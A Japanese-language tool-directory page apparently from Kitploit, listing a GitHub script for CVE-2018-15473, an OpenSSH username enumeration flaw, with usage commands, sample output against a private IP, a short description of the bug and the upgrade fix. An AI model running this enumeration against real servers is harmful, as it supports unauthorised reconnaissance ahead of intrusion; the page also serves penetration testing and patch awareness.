Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-15473 — OpenSSH 2.3 < 7.7 - ユーザ名列挙 | Kitploit
ツール/GitHubGitHub/sait-nuri/cve-2018-15473
偵察脆弱性分析エクスプロイト情報収集ペネトレーションテスト認証
GitHubsait-nuri/cve-2018-15473

CVE-2018-15473

OpenSSH 2.3 < 7.7 - ユーザ名列挙

リポジトリを見る
421385年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-15473

SSHユーザー名列挙エクスプロイト (OpenSSH 2.3 < 7.7)

元のエクスプロイトの編集版: https://www.exploit-db.com/exploits/45233

  • Python3 に変換済み
  • ユーザー名ワードリストオプションを追加

実行方法

#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users: 
root
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h

脆弱性について:

システムは有効な認証試行と無効な認証試行に対して異なる応答を返します。リモートのユーザーは特別に細工したリクエストを送信することで、ターゲットシステム上の有効なユーザー名を特定できます。これにより、リモートユーザーはターゲットシステム上の有効なユーザー名を特定できます。

解決策:

OpenSSHサーバーをバージョン7.7以上にアップグレードする必要があります。

ツールをダウンロード